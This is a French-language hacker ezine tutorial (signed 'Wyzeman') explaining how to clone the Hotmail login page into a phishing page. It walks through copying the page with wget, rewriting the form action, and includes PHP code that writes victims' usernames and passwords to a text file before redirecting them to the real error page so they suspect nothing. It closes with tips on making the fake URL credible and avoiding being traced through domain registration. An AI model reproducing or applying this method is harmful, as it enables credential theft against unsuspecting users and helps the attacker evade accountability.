.-- -- ---- ----. ___| MKD1001\008 |____ _ ___________ _ ___________________________________ | '---------------' | | | | .---- - ----------------- - ---------------------------------- - --. . '-----' '---' Fake Hotmail AKA L'art d'etre vrai quand tes pas vrai N'est stupide que la stupidité, mais pour une raison que j'ignore des gens cherches à faker hotmail depuis aussi longtemps que je puisse me souvenir et aucune release valable et simple d'utilisation n'est accessible à partir d'une simple recherche sur google depuis tout se temps. Alors que pourtant on peu facilement en moin de une heure confectionner un fake de hotmail plus simple a utiliser qu'une cuillere. Une touche de wget, un peu de parsing, quelque ligne de php et nous voici well suit pour faire nos faussaires de la male virtuel. Je ne me contenterais pas de vous donnez le poisson sans vous apprendre à pècher, en effet, hotmail change de look de facon réguliere depuis ses debuts, et le fake présentement offert ne sera pas indefiniment au gout du jour. Mais en expliquant la facon d'on je l'ai créé, vous serrez en mesure de l'appliquer sur les prochaines version de hotmail. On peu diviser en 3 etapes distinctives les procedures à suivre afin de se créer sont propre fake hotmail maison. Soit, la ceuillette du matériel de base, l'analyse et le trimage des sources et en dernier lieu la redirection et la récupération des donner frauduleuses. Pour se faire, vous aurez besoin de quelques outils dont : wget ou curl, un browser web graphique et php ou perl. L'exemple qui suit demontreras la methode utiliser avec wget et php. 1) ceuillette du materiel de base la technique est plutot simple, il suffit de taper www.hotmail.com dans un browser quelquonque, de copier coller le lien reel vers lequel on est rediriger, et de faire un wget sur se url. nous obtiendrons un fichier html dans lequel si on y regarde comme il faut, on peu trouver les url des differents fichier javascript requis pour assurer le clonage integrale de la page dacceuille de hotmail. Certain dentre eux seront a disabler plus tard pour assurer la redirection telle que desirer. Dans le pire des cas nous pouvons nous passer de tout les javascripts il ne controle que des options de la page dacceuille et naffecte pas le bon deroulement du formulaire outre sa redirection. Je conseillerais aussi de downloader le ficher css de hotmail, mais vous pouvez toujours utiliser ceux hoster sur hotmail meme, tant que les urls ne seront pas modifier. Par contre en les incorporants a votre fake hotmail vous lui assurez une stabiliter suplementaire 2) analyse et trimage des sources Bon la premiere chose que lon decouvre c'est que les sources de hotmail utilise un format de fin de ligne de type \n et non pas \r\n, ce qui nous impose une premiere conversion si nous travaillons sous windows, sous peine de ne pas sy retrouver beaucoup, en second afin de bien comprendre le code, je suggere de trimer au maximum le contenu dune copie afin doptenir le minimum requis pour que le formulaire dinscription fonctionne tout en conservant le look initial. vous devrier obtenir quelque chose du genre : Sign In
Sign In to Hotmail Help
 

Sign in using enhanced security

Microsoft Passport Network Microsoft Passport Network
Account Services |  Privacy Statement |  Terms of Use
© 2006 Microsoft Corporation. All rights reserved.
 
la ligne importante a identifier est celle ci
ou jai mi mkd.php a la place du url qui sert d'interpreteur de login a hotmail. dans cette version, j'ai carrement desactiver lensemble des javascripts, ceux ci interferais avec le form action. Mais il est aussi possible de downloader les javascripts et de modifier ceux ci pour que l'execution de la page pointe sur votre fichier a vous. mais cest beaucoup plus simple de sen passer pour une perte peu significative de realisme. sinon vous devrez aussi modifier les autre url de css ou d'inclusion de fichier pour le url complet web au lieu de l'url relatif local utiliser dans le code de hotmail. Si vous avez downloader les css et les js, changer les url pour votre url relatif local, bien evidament. 3) redirection et recuperation la parti la plus simple et interressante, la cerise sur le sunday. ici on recupere le user pass de notre bon samaritain naif et on le renvois sur la page derreur de hotmail, il croirat donc avoir faite une erreur de frappe, reiterreras sa demande de login cette fois ci sur le vrai serveur et aura access a sont compte et ne se sera sans doute rendu compte de rien. C'est ici que le contenu de notre fichier mkd.php intervient. "; //echo $_POST['passwd']; $fp = fopen("hotpass.txt","a+"); fputs($fp,$_POST['login']." \ ".$_POST['passwd']."\r\n"); fclose($fp); header("location:https://login.passport.com/ppsecure/post.srf"); ?> se simple code intercepte les user/pass incrit dans votre faux formulaire et redirige l'utilisateur flouer sur la veritable page derreur de hotmail a l'insus de celui ci. 4) Conclusion Comme vous avez pu remarquer, il n'y a rien la de tres compliquer qui j'ustifie un manque aussi flagrant d'information. Je conseille fortement a qui veux sessayer d'utiliser un url plus credible que pageabob.com/hotmail/index.html a la fois dans le nom du url que dans les arguments qui peuvent etre faker facilement sans influence sur le code a l'aide de mod_rewrite (voir article sur mod_rewrite publier dans un ezine precedent). De plus je ne vous conseille pas d'enregistrer le domaine a votre nom n'y a votre addresse n'y de l'utiliser d'une facon ou d'une autre a partir dun compte web qui pourrais vous trahir. En fait si vous savez pas sque vous faites, l'imiter vous a impressinner vos ami avec votre fake hotmail, mais sans vous en servire pour vrai ;). .-----. .---. | '----- - ------ - ------- - ------------------------------------- -' | | | |______ _ ________________________________.--------------------.______ _ ____| | by Wyzeman | '--------------------'